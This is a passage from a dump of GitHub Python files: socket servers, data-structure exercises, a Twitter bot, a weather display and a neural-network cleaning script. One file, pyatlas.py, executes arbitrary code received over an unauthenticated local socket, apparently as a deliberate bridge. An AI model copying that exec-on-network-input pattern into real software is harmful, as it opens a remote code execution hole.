'utf-8'\n\n\n# ----------------------------------------------------------------------------------------\n#\n# MESSAGES, COMMON VARIABLES, AND SAVED QUEUE (saved_q)\n#\n# ----------------------------------------------------------------------------------------\n\"\"\"\n- Saved messages for communication\n- Saved variables that can be changed by client.\n\"\"\"\nstart_msg = \"Server is starting....\"\ndisconnect_msg = \"quit\"\nreceive_msg = \"send\"\nempty = \"empty\"\nnum = 3\nsaved_q = deque()\n\n\n# ----------------------------------------------------------------------------------------\n#\n# SERVER SET UP WITH SOCKET\n#\n# ----------------------------------------------------------------------------------------\n\"\"\"\nBind to local host.\n\"\"\"\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\n\n# ----------------------------------------------------------------------------------------\n#\n# HANDLE CLIENT\n#\n# ----------------------------------------------------------------------------------------\ndef handle_client(conn, addr):\n # alerts to new client connection\n print(f\"NEW CONNECTION: {addr} connected.\")\n\n connected = True\n while connected:\n # set up for reading message\n msg_length = conn.recv(HEADER).decode(FORMAT)\n if msg_length:\n msg_length = int(msg_length)\n msg = conn.recv(msg_length).decode(FORMAT)\n\n # please use this for clean disconnect to avoid error messages\n if msg == disconnect_msg:\n print(f\"Quit request received:\", disconnect_msg)\n msg = empty\n message = msg.encode(FORMAT)\n conn.send(message)\n connected = False\n\n # client used \"receive\" and wants saved searches returned\n if msg == receive_msg:\n msg = \"\"\n for item in saved_q:\n msg += f\" {item},\"\n message = msg.encode(FORMAT)\n conn.send(message)\n\n # client has sent a recent conversion to save\n else:\n #\n print(msg)\n saved_q.append(msg)\n print(\"current queue:\", saved_q)\n if len(saved_q) > num:\n saved_q.popleft()\n print(\"dequeued:\", saved_q)\n msg = empty\n message = msg.encode(FORMAT)\n conn.send(message)\n\n # can be removed - for server side only\n print(f\"We have received and processed the following message: \\n {msg}\")\n\n conn.close()\n\n\n# ----------------------------------------------------------------------------------------\n#\n# START: LISTEN AND THREAD\n#\n# ----------------------------------------------------------------------------------------\ndef start():\n server.listen()\n print(f\"Server is listening on: {SERVER}\")\n while True:\n conn, addr = server.accept()\n thread = threading.Thread(target=handle_client, args=(conn, addr))\n thread.start()\n\n # This prints how many client connections.\n # Minus 1 from active threads for this server start thread.\n print(f\"ACTIVE CONNECTIONS: {threading.activeCount()-1}\")\n\n\n# ----------------------------------------------------------------------------------------\n#\n# START MESSAGE / CALL START FUNCTION\n#\n# ----------------------------------------------------------------------------------------\nprint(start_msg)\nstart()","repo_name":"kallka/CS361-Microservice-SaveRecent","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"33638297505","text":"from json import loads\na = open(\"repaso/AM1/practico7.json\")\ns = a.read()\nlista = loads(s)\n\nlistaLenguajes = []\nfor persona in lista:\n listaLenguajes += persona[\"languages\"] # 
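The unit-converter server above frames every message as a 64-byte UTF-8 length field followed by the payload, and answers the 'send' command with the saved conversions. A matching client-side sketch; the host and port mirror the server's constants, and int() on the server side tolerates the space padding:

import socket

HEADER = 64
FORMAT = 'utf-8'

def send_message(sock: socket.socket, text: str):
    payload = text.encode(FORMAT)
    header = str(len(payload)).encode(FORMAT)
    header += b' ' * (HEADER - len(header))   # pad the length field to 64 bytes
    sock.sendall(header + payload)

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((socket.gethostname(), 5050))
send_message(client, 'send')                  # ask for the saved conversions
print(client.recv(1024).decode(FORMAT))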
acumulo todas las listas en una sola\n\nconjuntoLenguajes = set(listaLenguajes) # eliminar los repetidos al convertir en conjunto\n\n# print(listaLenguajes, len(listaLenguajes))\n# print(conjuntoLenguajes, len(conjuntoLenguajes))\n\nlistaLenguajesSinRepetir = list(conjuntoLenguajes) # vuelvo a convertir a lista para recorrer\n\nlistaResultados = []\nmayor = 0\nfor lenguaje in listaLenguajesSinRepetir:\n # d = {lenguaje: listaLenguajes.count(lenguaje)}\n # listaResultados.append(d)\n contador = listaLenguajes.count(lenguaje)\n if contador > mayor:\n mayor = contador\n lenguajeMasHablado = lenguaje\n\nprint(lenguajeMasHablado, mayor)\n\n\na.close()\n","repo_name":"pablokan/22prog1","sub_path":"repaso/AM1/pr7.py","file_name":"pr7.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16162946604","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclass Graph:\n def __init__(self):\n pass\n\n def graph_plot(self, data, headers, name_x, name_y):\n years = list(range(1990, 2020))\n\n for i, sublist in enumerate(data):\n # Extract data from sublist and convert to a numpy array\n values = sublist[0][0].split()\n x = np.arange(1, len(values) + 1)\n y = np.array(values, dtype=float)\n\n plt.title(headers[i])\n plt.xlabel(name_x)\n plt.ylabel(name_y)\n\n plt.scatter(x, y)\n m, b = np.polyfit(x, y, 1)\n slope = (m * x) + b\n plt.plot(x, slope)\n plt.xticks(x[::3], years[::3])\n plt.show()\n","repo_name":"JojayD/lab-3","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71998196593","text":"# Interview Question #8\n#\n# Construct an in-place algorithm to reverse a linked list!\n\nclass Node:\n\n def __init__(self, data):\n self.data = data\n self.next_node = None\n\n def __repr__(self):\n return str(self.data)\n\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n self.num_of_nodes = 0\n\n # O(N) running time complexity\n def reverse(self):\n current_node = self.head\n previous_node = None\n\n while current_node is not None:\n next_node = current_node.next_node\n current_node.next_node = previous_node\n previous_node = current_node\n current_node = next_node\n\n self.head = previous_node\n\n def insert_start(self, data):\n self.num_of_nodes += 1\n new_node = Node(data)\n\n if self.head is None:\n self.head = new_node\n else:\n new_node.next_node = self.head\n self.head = new_node\n\n def insert_end(self, data):\n self.num_of_nodes += 1\n new_node = Node(data)\n\n if self.head is None:\n self.head = new_node\n else:\n actual_node = self.head\n\n while actual_node.next_node is not None:\n actual_node = actual_node.next_node\n\n actual_node.next_node = new_node\n\n def size_of_list(self):\n return self.num_of_nodes\n\n def traverse(self):\n\n actual_node = self.head\n\n while actual_node is not None:\n print(actual_node)\n actual_node = actual_node.next_node\n\n def remove(self, data):\n\n if self.head is None:\n return\n\n actual_node = self.head\n previous_node = None\n\n while actual_node is not None and actual_node.data != data:\n previous_node = actual_node\n actual_node = actual_node.next_node\n\n if actual_node is None:\n return\n\n if previous_node is None:\n self.head = actual_node.next_node\n else:\n previous_node.next_node = actual_node.next_node\n\n\nif __name__ == 
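The JSON exercise above (its Spanish comments read: "accumulate all the lists into one", "remove duplicates by converting to a set", "convert back to a list to iterate") finds the most spoken language with a manual counter loop. collections.Counter condenses the whole search; most_spoken is a helper name introduced here:

from collections import Counter

def most_spoken(people: list) -> tuple:
    """people: dicts with a 'languages' list, as in practico7.json."""
    counts = Counter(lang for person in people for lang in person['languages'])
    return counts.most_common(1)[0]          # (language, count)

assert most_spoken([{'languages': ['es', 'en']},
                    {'languages': ['es']}]) == ('es', 2)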
'__main__':\n\n    linked_list = LinkedList()\n\n    insertionList = [12, 122, 3, 31, 10, 11]\n\n    for i in insertionList:\n        linked_list.insert_start(i)\n\n    linked_list.traverse()\n    linked_list.reverse()\n    print('reverse list')\n    linked_list.traverse()\n","repo_name":"MarcusSanchez/DataStructures-Algorithms-Python","sub_path":"Linked Lists/3. Linked Lists Interview Questions/8. Reverse Linked List in Place.py","file_name":"8. Reverse Linked List in Place.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"21265916888","text":"import bs4\nimport re\n\n\ndef Capture_Hashtags(text):\n    \n    #task 1: Clean up HTML (mainly new lines)\n    soup = bs4.BeautifulSoup(text, 'lxml')\n    text = soup.get_text()\n    text = text.replace('\\n',' ')\n    text = text.replace('\\r','.')\n    \n    #task 4: remove links\n    text = re.sub('https?://[A-Za-z0-9./~]+','', text)\n    hashtags = re.findall(r'#(\\w+)',text)\n    return hashtags\n","repo_name":"Bvlymen/twitter_crypto_project","sub_path":"sentiment_model_git/CaptureHashtags.py","file_name":"CaptureHashtags.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"10441418821","text":"# Python implementation\n\n# \tProgram : File Server Implementation (Server)\n# \tStatus : Stable\n# \tCreated by : Sarath Peter\n\n## Import packages here\nimport socket\n## Write functions here\n\n## Write code here\n\nport = 10101                    # Reserve a port for your service.\ns = socket.socket()             # Create a socket object\nhost = socket.gethostname()     # Get local machine name\ns.bind((host, port))            # Bind to the port\ns.listen(5)                     # Now wait for client connection.\n\nprint('------- File Server is online ------')\n\nwhile True:\n    conn, addr = s.accept()     # Establish connection with client.\n    print(addr[0]+':'+str(addr[1])+\" is online\")\n    data = conn.recv(1024)\n    print(repr(data))\n\n    filename='test_message.txt'\n    f = open(filename,'rb')\n    l = f.read(1024)\n    while (l):\n        conn.send(l)\n        print('Sent :\\n')\n        print(l)\n        l = f.read(1024)\n    f.close()\n\n    print('\\nFile Sent to '+addr[0]+':'+str(addr[1]))\n    conn.send('Thank you for connecting Sarath\\'s File Server '.encode())\n    conn.close()\n","repo_name":"SamLikesCoding/Network_Lab","sub_path":"FileServer/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27478256841","text":"from collections import deque\nimport sys\n\ndef bfs(start, distance):\n\tcount = 0\n\tqueue = deque([start])\n\tvisited = [False] * (N + 1)\n\tvisited[start] = True\n\twhile queue:\n\t\tcount+=1\n\t\ttarget = queue.popleft()\n\t\tfor rel in graph[target]:\n\t\t\tif not visited[rel]:\n\t\t\t\tqueue.append(rel)\n\t\t\t\tdistance[rel] = distance[target] + 1\n\t\t\t\tvisited[rel] = True\n\ninput = sys.stdin.readline\nN, M = map(int, input().split())\n\ngraph = [[] for i in range(N + 1)]\nfor i in range(M):\n\tfriend1, friend2 = map(int, input().split())\n\tif friend1 not in graph[friend2]:\n\t\tgraph[friend1].append(friend2)\n\t\tgraph[friend2].append(friend1)\n\nmin_value = 10000\nanswer = 0\nfor i in range(1, N + 1):\n\tcount = 0\n\tdistance = [0 for i in range(N + 1)]\n\tbfs(i, distance)\n\tfor j in range(1, N + 1):\n\t\tif j != i:\n\t\t\tcount += distance[j]\n\tif count < min_value:\n\t\tmin_value = count\n\t\tanswer = 
i\nprint(answer)\n\n","repo_name":"YUIWOO/study_coding_test","sub_path":"baekjoon/kmularise/p1389.py","file_name":"p1389.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"43044789103","text":"import json\nimport boto3\nimport random\n\nkinesis = boto3.client('kinesis')\ndef getReferrer():\n data = {}\n data['LOGENTRY'] = '203.0.113.24 - - [25/Mar/2018:15:25:37 -0700] \"GET /index.php HTTP/1.1\" 200 125 \"-\" \"Mozilla/5.0 [en] Gecko/20100101 Firefox/52.0\"'\n return data\n\nwhile True:\n data = json.dumps(getReferrer())\n print(data)\n kinesis.put_record(\n StreamName=\"ExampleInputStream\",\n Data=data,\n PartitionKey=\"partitionkey\")","repo_name":"arunmastermind/AWS-examples-using-BOTO3","sub_path":"kda/kda-python-datagenerator-regexlog.py","file_name":"kda-python-datagenerator-regexlog.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24927219395","text":"from requests_oauthlib import OAuth1Session\nimport os\nimport json\nimport io\nimport urllib.request\nfrom typing import *\nfrom scripts.config_bot import credentials, user_id, urls\n\n\n__author__ = 'kqureshi'\n\n\nclass Bot:\n\n @classmethod\n def fetch_auth(cls) -> None:\n \"\"\"\n\n \"\"\"\n consumer_key, consumer_secret = credentials['consumer_key'], credentials['consumer_secret']\n oauth = OAuth1Session(consumer_key, client_secret=consumer_secret)\n request_token_url = urls['request_token']\n fetch_response = oauth.fetch_request_token(request_token_url)\n resource_owner_key = fetch_response.get(\"oauth_token\")\n resource_owner_secret = fetch_response.get(\"oauth_token_secret\")\n base_authorization_url = urls['authorize']\n authorization_url = oauth.authorization_url(base_authorization_url)\n verifier = input(\"Please paste the pin from \\n {} \\n here: \".format(authorization_url))\n oauth = OAuth1Session(\n consumer_key,\n client_secret=consumer_secret,\n resource_owner_key=resource_owner_key,\n resource_owner_secret=resource_owner_secret,\n verifier=verifier,\n )\n access_token_url = urls['access_token']\n oauth_tokens = oauth.fetch_access_token(access_token_url)\n access_token = oauth_tokens[\"oauth_token\"]\n access_token_secret = oauth_tokens[\"oauth_token_secret\"]\n return OAuth1Session(consumer_key,\n client_secret=consumer_secret,\n resource_owner_key=access_token,\n resource_owner_secret=access_token_secret,\n )\n\n @classmethod\n def tweet(cls, text: str, reply_to: Optional[str] = None, media_url: Optional[str] = None,\n oauth: OAuth1Session = None) -> None:\n \"\"\"\n\n \"\"\"\n params = {\"text\": '{}'.format(str(text))}\n if isinstance(media_url, str):\n buffer = io.BytesIO(urllib.request.urlopen(media_url).read())\n media_response = oauth.post(urls['media'], files={\"media\": ('image.png', buffer)})\n media_string = media_response.json()['media_id_string']\n params['media'] = {'media_ids': [media_string]}\n if isinstance(reply_to, str):\n params['reply'] = {\"in_reply_to_tweet_id\": reply_to}\n response = oauth.post(urls['tweets'], json=params)\n return\n\n @classmethod\n def delete_tweet(cls, tweet_id: str, oauth: OAuth1Session = None) -> None:\n \"\"\"\n\n \"\"\"\n response = oauth.delete(\"{endpoint}/{tweet_id}\".format(tweet_id=tweet_id, endpoint=urls['tweets']))\n if response.status_code != 200:\n raise Exception(\"Failed to delete tweet\")\n return\n\n @classmethod\n def retweet(cls, tweet_id: str, 
oauth: Optional[OAuth1Session] = None) -> None:\n        \"\"\"Retweet the given tweet as the configured user.\"\"\"\n        response = oauth.post(urls['retweets'].format(user_id=user_id),\n                              json={\"tweet_id\": \"{tweet_id}\".format(tweet_id=tweet_id)})\n        if not response.json()['data']['retweeted']:\n            print('Failed to retweet')\n        return\n\n    @classmethod\n    def like(cls, tweet_id: str, oauth: Optional[OAuth1Session] = None) -> None:\n        \"\"\"Like the given tweet as the configured user.\"\"\"\n        response = oauth.post(urls['like'].format(user_id=user_id),\n                              json={\"tweet_id\": \"{tweet_id}\".format(tweet_id=tweet_id)})\n        if not response.json()['data']['liked']:\n            raise Exception('Failed to like tweet')\n        return\n\n    @classmethod\n    def follow(cls, follow_id: str, oauth: Optional[OAuth1Session] = None) -> None:\n        \"\"\"Follow the given id on behalf of the configured user.\"\"\"\n        response = oauth.post(urls['follow'].format(user_id),\n                              json={\"list_id\": \"{follow_id}\".format(follow_id=follow_id)})\n        return\n\n    @classmethod\n    def update_description(cls, description: str, oauth: OAuth1Session = None) -> None:\n        \"\"\"Update the profile description (bio) of the configured user.\"\"\"\n        response = oauth.post(urls['bio'], data={'description': '{description}'.format(description=description)})\n        if not response.status_code == 200:\n            raise Exception('Failed to update profile description')\n        return\n","repo_name":"zlisto/social_media_analytics","sub_path":"scripts/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"}
+{"seq_id":"5548015617","text":"import requests\nfrom datetime import datetime\nimport tkinter as tk\nimport config as cg\n\n# api key, url and designated city\napi_key = cg.api_key\nbase_url = \"http://api.openweathermap.org/data/2.5/weather?\"\ncity_name = cg.city_name\nfull_url = base_url + \"q=\" + city_name + \"&appid=\" + api_key\n\nbase_zip_url = \"http://api.openweathermap.org/data/2.5/weather?\"\nzip_name = cg.zip_code\nfull_zip_url = base_zip_url + \"zip=\" + str(zip_name) + \"&appid=\" + api_key\n\n\"\"\"\nUpdates the text for the labels in the main display.\nDoes this by collecting info from datetime and openweathermap api\n\nArgs:\n    root: the root window, used to repeat process\n    tempLabel: label for temperature\n    clothesLabel: label for clothing recommendation\n    timeLabel: label for the current time\n    dateLabel: label for the current date\n    weatherLabel: label for the weather description\n\nReturns:\n    n/a\n\"\"\"\n\n\ndef update(root, tempLabel, clothesLabel, timeLabel, dateLabel, weatherLabel):\n    # determines whether to display 24 hour clock\n    if cg.militaryTime:\n        timeLabel['text'] = datetime.now().strftime(\"%H:%M\")\n    # displays 12 hour clock\n    else:\n        # determines whether or not to display am or pm\n        if (datetime.now().hour / 12) < 1:\n            period = \"am\"\n        else:\n            period = \"pm\"\n        # determines number of hour shown\n        # because midnight is am and noon is pm, must be calculated separate from am/pm\n        if datetime.now().hour <= 12:\n            timeLabel['text'] = datetime.now().strftime(\"%H:%M\") + period\n        else:\n            timeLabel['text'] = str(datetime.now().hour - 12) + \":\" + datetime.now().strftime(\"%M\") + period\n\n    # displays date\n    dateLabel['text'] = datetime.now().strftime(\"%A %B %d, %Y\\n\")\n\n    # obtain json from api\n    if cg.basedOnZip:\n        response = requests.get(full_zip_url)\n    else:\n        response = requests.get(full_url)\n    x = response.json()\n\n    # carries out if api called properly\n    if x[\"cod\"] != \"404\":\n\n        y = x[\"main\"]\n\n        # obtain current temp from json in kelvin\n        current_temperature = y[\"temp\"]\n        # calculate Fahrenheit from kelvin\n        fahrenheit = ((current_temperature - 273.15) * 1.8) + 32\n\n        # set 
temperature label text\n if cg.fahrenheit:\n tempLabel['text'] = \"{:.1f}\".format(fahrenheit)\n else:\n tempLabel['text'] = \"{:.1f}\".format(current_temperature - 273.15)\n\n # set clothing recommendation based on obtained temperature\n if fahrenheit > 100:\n clothesLabel[\"text\"] = \"It's HOT! Wear a tank top and drink lots of water!\\n\"\n elif 100 >= fahrenheit > 75:\n clothesLabel[\"text\"] = \"Its pretty hot outside. Shorts weather!\\n\"\n elif 75 >= fahrenheit > 50:\n clothesLabel[\"text\"] = \"Its a comfortable temperature out. Pants and a T-shirt will do.\\n\"\n elif 50 >= fahrenheit > 32:\n clothesLabel[\"text\"] = \"It's a bit cold out. Wear long sleeves!\\n\"\n else:\n clothesLabel[\"text\"] = \"Its freezing out there! Wear as much layers as possible!\\n\"\n\n y = x[\"weather\"][0]\n\n desc = y[\"description\"]\n\n weatherLabel[\"text\"] = desc\n\n # returns error when city is not found\n else:\n tempLabel['text'] = \"City not found\"\n clothesLabel['text'] = \"Check your config file\"\n\n # rerun this function every second\n root.after(1000, update, root, tempLabel, clothesLabel, timeLabel, dateLabel, weatherLabel)\n\n\n\"\"\"\nMain function for the program.\nContains initialization of window and labels.\n\"\"\"\n\n\ndef main():\n # create window and frame for labels\n root = tk.Tk()\n root.attributes('-fullscreen', cg.fullscreen)\n root.geometry(\"750x750\")\n frame = tk.Frame(root)\n\n # create labels\n timeLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 60))\n dateLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 12))\n tempLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 60))\n clothesLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 12))\n weatherLabel = tk.Label(frame,\n anchor=tk.CENTER,\n justify=tk.CENTER,\n font=(\"Courier\", 12))\n\n # pack labels/frame\n timeLabel.pack(fill=\"x\")\n dateLabel.pack(fill=\"x\")\n tempLabel.pack(fill=\"x\")\n clothesLabel.pack(fill=\"x\")\n weatherLabel.pack(fill=\"x\")\n frame.pack(expand=1)\n\n # run fist instance of update\n update(root, tempLabel, clothesLabel, timeLabel, dateLabel, weatherLabel)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kable5/dailyDisplay","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20101835529","text":"import socket\nimport threading\nimport sys\nimport time\nimport atexit\nimport re\n\n\nephestos_running = False\nthread_created = False\nthreadSocket = 0\nsocketServer = 0\nreceivedSocket = \"none\"\nlistening = False\nsocketMessages = []\nshutDown = False\nreceivedData = ''\npherror = [\"\"]\nalogging = True\n\ndef initialize_server():\n if alogging:\n print(\"initializing server\")\n\n global threadSocket,listening\n #threadSocket = threading.Thread(name='threadSocket', target= socket_listen)\n listening = True\n\n if alogging:\n print(\"calling create_socket_connection\")\n\n create_socket_connection()\n socket_listen()\n #threadSocket.start()\n\n\ndef socket_listen():\n global receivedSocket,listening, receivedData,socketServer, socketMessages, pherror\n socketServer.listen(5)\n\n\n while listening:\n (receivedSocket , adreess) = socketServer.accept()\n receivedData = (receivedSocket.recv(1024)).decode(\"utf-8\")[:-2]\n\n\n socketMessages.append(receivedData)\n 
time.sleep(0.03)\n handle_messages()\n\n if alogging:\n print(\"pherror : \" ,pherror)\n\n\n while not (pherror[-1]==\"\"):\n\n receivedSocket.sendall((pherror[-1]+'\\n').encode())\n if alogging:\n print(\"I have sent err : --->\"+ pherror[-1] + ' <---- and removed it from the list of errors')\n\n if len(pherror) > 1:pherror.remove(pherror[-1])\n\n\n receivedSocket.sendall(\"end of error\\n\".encode())\n # receivedSocket.close()\n\ndef create_socket_connection():\n global socketServer, shutDown\n socketServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socketServer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n socketServer.bind(('127.0.0.1',4000))\n\n\n\n\ndef handle_messages():\n global ephestos_running, thread_created, listening, socketServer, socketMessages, pherror, shutDown\n\n for msg in socketMessages:\n try:\n if \"RetValue:\" in msg:\n regexobj = re.compile(\"[^(RetValue:)]\\S.*\")\n regexsearch = regexobj.search(msg)\n pythoncomm = regexsearch.group(0)\n pherror.append(\"RetValue:\"+str(eval(pythoncomm)))\n #pherror.append(\"no error\\n\")\n\n if alogging:\n print(\"eval with pherror: \",pherror)\n\n elif \"exit\" in msg:\n pherror.append(\"no error\\n\")\n shutDown=True\n else:\n exec(msg,globals())\n pherror.append(\"no error\\n\")\n except Exception as e:\n newerror = \"Error:\" +str(e)+\" with :\" + msg\n pherror.append( newerror )\n if alogging:\n print( \"inserted an error now pherror : \",pherror)\n\n #socketMessages.remove(msg)\n socketMessages.remove(msg)\n\n if shutDown:\n ephestos_running = False\n listening = False\n\n socketServer.settimeout(0.01)\n socketServer.close()\n time.sleep(1)\n\n #threadSocket.join()\n del socketServer\n\n thread_created = False\n shutDown = False\n\n\n\ndef initAtlas():\n\n #anotherThread = threading.Thread(target=another_thread)\n #anotherThread.start()\n\n initialize_server()\n\n\n\n\nif __name__ == \"__main__\":\n initAtlas()\n","repo_name":"kilon/Atlas","sub_path":"pyatlas.py","file_name":"pyatlas.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"39"} +{"seq_id":"9034739812","text":"import threading\nimport logging\nimport time\n\nfrom PySide2.QtWidgets import QMainWindow, QApplication, QMdiSubWindow, QMessageBox\nfrom PySide2.QtGui import QCloseEvent\nfrom PySide2.QtCore import Qt, QCoreApplication, QSettings\n\nfrom src.ui_mainwindow import Ui_MainWindow\nfrom src.settings import Settings\nfrom src.goodsin import GoodsIn\nfrom src.goodsout import GoodsOut\nfrom src.raw import Raw\nfrom src.edit import Edit\nfrom src.dataout import DataOut\nfrom src.admin import Admin\nimport src.db as DB\n\n\nABOUT = '# TODO'\nAPPLICATION = 'GoReg'\nDOMAIN = 'https://www.tmstudios.de/'\nORGANIZATION = 'tm studios'\nVERSION = '0.0.2'\nPING_DELAY = 60\n\n\nclass MainWindow(Ui_MainWindow):\n Modules = {\n 'gin': GoodsIn,\n 'gout': GoodsOut,\n 'raw': Raw,\n 'edit': Edit,\n 'dout': DataOut,\n 'admin': Admin\n }\n\n def __init__(self):\n self.app = QApplication([])\n QCoreApplication.setApplicationName(APPLICATION)\n QCoreApplication.setApplicationVersion(VERSION)\n QCoreApplication.setOrganizationDomain(DOMAIN)\n QCoreApplication.setOrganizationName(ORGANIZATION)\n self.widget = QMainWindow()\n self.setupUi(self.widget)\n self.setting = QSettings('GoReg.conf', QSettings.IniFormat)\n\n self.modules = {}\n\n self.action_settings.triggered.connect(self.show_settings)\n self.action_login.triggered.connect(self.login)\n 
self.action_logout.triggered.connect(self.logout)\n        self.action_goods_in.triggered.connect(\n            lambda: self.add_module('gin'))\n        self.action_goods_out.triggered.connect(\n            lambda: self.add_module('gout'))\n        self.action_raw.triggered.connect(lambda: self.add_module('raw'))\n        self.action_edit.triggered.connect(lambda: self.add_module('edit'))\n        self.action_do.triggered.connect(lambda: self.add_module('dout'))\n        self.action_admin.triggered.connect(lambda: self.add_module('admin'))\n        self.action_aboutqt.triggered.connect(\n            lambda: QMessageBox.aboutQt(self.widget))\n        self.action_about.triggered.connect(\n            lambda: QMessageBox.about(\n                self.widget, APPLICATION, '\\n'.join([VERSION, ORGANIZATION, ABOUT])))\n        self.widget.closeEvent = self.on_quit\n\n        self.do_ping = False\n        self.ping_thread = None\n\n        self.widget.show()\n        self.app.exec_()\n\n    def add_module(self, name: str) -> None:\n        if name not in self.modules:\n            self.modules[name] = self.Modules[name]()\n            widget = self.modules[name].widget\n            window = QMdiSubWindow(self.mdiArea)\n            window.setWidget(widget)\n            window.closeEvent = lambda evt: self.close_widget(name, evt)\n            window.resize(640, 480)\n\n            self.mdiArea.addSubWindow(window)\n            widget.show()\n\n    def close_widget(self, name: str, event: QCloseEvent) -> None:\n        module = self.modules[name]\n        if module.close() == True:\n            self.modules.pop(name)\n            event.accept()\n        else:\n            event.ignore()\n\n    def login(self) -> bool:\n        config = {\n            'host': self.setting.value('database/address'),\n            'port': self.setting.value('database/port'),\n            'database': 'GoReg',\n            'user': self.setting.value('database/user'),\n            'password': self.setting.value('database/password')\n        }\n\n        if config['host'] == None:\n            QMessageBox.critical(self.widget,\n                                 'Fehler',\n                                 'Software wurde noch nicht konfiguriert')\n            return False\n\n        try:\n            DB.connect(config)\n        except DB.MySQL.Error as err:\n            QMessageBox.critical(self.widget,\n                                 'Fehler',\n                                 'Keine Verbindung zur Datenbank')\n            return False\n\n        self.ping_thread = threading.Thread(target=self.ping)\n        self.do_ping = True\n        self.ping_thread.start()\n\n        self.action_login.setDisabled(True)\n        self.action_logout.setDisabled(False)\n        self.action_settings.setDisabled(True)\n        self.action_admin.setDisabled(False)\n        self.action_do.setDisabled(False)\n        self.action_edit.setDisabled(False)\n        self.action_goods_in.setDisabled(False)\n        self.action_goods_out.setDisabled(False)\n        self.action_raw.setDisabled(False)\n\n        self.statusbar.showMessage('Verbunden mit Datenbank', 10000)\n        return True\n\n    def logout(self) -> bool:\n        do_close = True\n        arr = [x for x in self.modules.values()]\n        for module in arr:\n            do_close &= module.widget.parentWidget().close()\n        if not do_close:\n            return False\n\n        try:\n            DB.disconnect()\n        except DB.MySQL.Error as err:\n            QMessageBox.critical(self.widget, 'Fehler',\n                                 'Keine Verbindung zur Datenbank')\n            return False\n\n        self.do_ping = False\n        if self.ping_thread is not None:\n            if self.ping_thread.is_alive():\n                self.ping_thread.join()\n\n        self.action_login.setDisabled(False)\n        self.action_logout.setDisabled(True)\n        self.action_settings.setDisabled(False)\n        self.action_admin.setDisabled(True)\n        self.action_do.setDisabled(True)\n        self.action_edit.setDisabled(True)\n        self.action_goods_in.setDisabled(True)\n        self.action_goods_out.setDisabled(True)\n        self.action_raw.setDisabled(True)\n\n        self.statusbar.showMessage('Verbindung zur Datenbank beendet', 10000)\n        return True\n\n    def on_quit(self, event: QCloseEvent) -> None:\n        if self.logout():\n            event.accept()\n        else:\n            event.ignore()\n\n    def ping(self) -> None:\n        
delay = 0\n while self.do_ping:\n if delay < PING_DELAY:\n delay += 1\n time.sleep(1)\n else:\n delay = 0\n DB.ping()\n\n def show_settings(self):\n dialog = Settings(self.widget)\n # TODO\n\n","repo_name":"MarcelAllmrodt/GoReg","sub_path":"src/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42077128946","text":"import pynever.networks as pyn_net\nimport pynever.strategies.conversion as pyn_conv\nimport pynever.strategies.verification as pyn_ver\nimport pynever.nodes as pyn_nodes\nimport pynever.strategies.smt_reading as pyn_smt\nimport onnx\nimport logging\nimport os\nimport copy\nfrom datetime import datetime\n\n\n#\n#\n#\n#\n# ##### DIRECTORIES CREATION #####\nlogs_dir = \"logs/\"\nif not os.path.exists(logs_dir):\n os.mkdir(logs_dir)\n\nclean_dir = \"clean_onnx/\"\nif not os.path.exists(clean_dir):\n os.mkdir(clean_dir)\n\n#\n#\n#\n#\n# ##### PARAMETERS DEFINITION #####\nonnx_path = \"onnx_nets/\"\nonnx_ids = [\"cartpole.onnx\", \"dubinsrejoin.onnx\", \"lunarlander.onnx\"]\n\n#\n#\n#\n#\n# ##### MODELS CLEANING #####\n\nfor onnx_id in onnx_ids:\n net_id = onnx_id.replace(\".onnx\", \"\")\n onnx_model = pyn_conv.ONNXNetwork(net_id, onnx.load(onnx_path + onnx_id))\n temp_net = pyn_conv.ONNXConverter().to_neural_network(onnx_model)\n\n # Network cleaning: we assume only the FC nodes and the ReLU nodes are relevant\n assert isinstance(temp_net, pyn_net.SequentialNetwork)\n current_node = temp_net.get_first_node()\n clean_net = 